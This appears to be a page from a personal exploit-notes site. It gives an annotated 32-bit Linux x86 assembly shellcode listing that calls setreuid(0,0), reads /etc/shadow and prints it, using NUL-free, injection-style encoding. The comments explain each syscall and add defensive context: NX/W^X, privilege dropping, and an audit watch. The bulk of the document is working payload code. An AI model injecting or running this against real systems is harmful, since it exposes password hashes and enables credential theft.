NENote of Exploiting


[SC] print_shadow.s : 2006-11-21


# print_shadow.s -- 32-bit Linux x86, GAS/AT&T syntax, int $0x80 syscall ABI
# (eax = syscall number, ebx/ecx/edx = arguments, result returned in eax).
#
# Syscall sequence, in order:
#   setreuid(0, 0); open("/etc/shadow", O_RDONLY); read(fd, esp, 255);
#   write(1, esp, 255); exit(0)
#
# Properties visible in the listing:
#   - No syscall result is checked. Each later "mov $imm, %al" / "%bl"
#     sets only the low byte, so it relies on the previous return value
#     being a small non-negative number (upper 24 bits zero).
#   - The path string sits next to the code and is patched in place at
#     run time, so the page holding it must be both writable and
#     executable. No section directive is given, so an ordinary build puts
#     this in .text, which is normally mapped read-only.
#   - Registers are zeroed with xorl and loaded through 8-bit immediates,
#     presumably to keep NUL bytes out of the encoding -- not verified
#     against the assembled bytes.
#
# Defensive reading: /etc/shadow is normally readable only by root, and
# setreuid(0, 0) succeeds only in a process that already holds privilege
# (for example a setuid-root binary), so this sequence is only meaningful
# inside an already-privileged process. Non-executable stack/heap (NX, W^X)
# blocks running it from data pages, privilege dropping in setuid programs
# removes the access it depends on, and an audit watch on reads of
# /etc/shadow (e.g. auditctl -w /etc/shadow -p r) records the open.

.globl main

main:

    # setreuid(0, 0) -- the original label said "setuid", but i386 syscall
    # 0x46 (70) is setreuid; ebx = real uid 0, ecx = effective uid 0.
    xorl   %eax,   %eax
    mov    $0x46,  %al
    xorl   %ebx,   %ebx
    xorl   %ecx,   %ecx
    int    $0x80
    jmp    ONE                  # jump ahead to the call placed before the string

TWO:

    # open(path, O_RDONLY)
    popl   %ebx                 # return address pushed by "call TWO" = address of the string
    xorl   %eax,   %eax
    mov    %al,    11(%ebx)     # overwrite the 'X' at offset 11 with NUL (self-modifying store)
    mov    $0x5,   %al          # syscall 5 = open
    xorl   %ecx,   %ecx         # flags = 0 (O_RDONLY)
    int    $0x80                # eax = fd, or a negative errno that is never tested

    # read(fd, esp, 255)
    xorl   %edx,   %edx
    mov    $0xff,  %dl          # count = 255
    # esp is back at its value on entry to main (the call pushed, the popl
    # popped), so the buffer overlays main's return address and the
    # caller's stack; the code never returns, it exits below.
    mov    %esp,   %ecx
    mov    %eax,   %ebx         # fd returned by open
    mov    $0x3,   %al          # syscall 3 = read; valid only if open's result fit in one byte
    int    $0x80

    # write(1, esp, 255) -- ecx and edx are left over from the read, so the
    # length is always 255 and not the byte count that read returned
    mov    $0x4,   %al          # syscall 4 = write
    mov    $0x1,   %bl          # fd 1 (stdout), given the upper bytes of ebx are zero
    int    $0x80

    # exit(0)
    mov    $0x1,   %al          # syscall 1 = exit
    xorl   %ebx,   %ebx         # status 0
    int    $0x80

ONE:
    # call pushes the address of the bytes that follow (the path string)
    # and transfers to TWO, which pops that address into ebx.
    call    TWO
    # The trailing 'X' is a placeholder replaced with NUL at run time.
    # .string also emits its own terminating NUL after the 'X'.
    .string "/etc/shadowX"

Copyleft (C) 2007 Len. All Rights Not Reserved.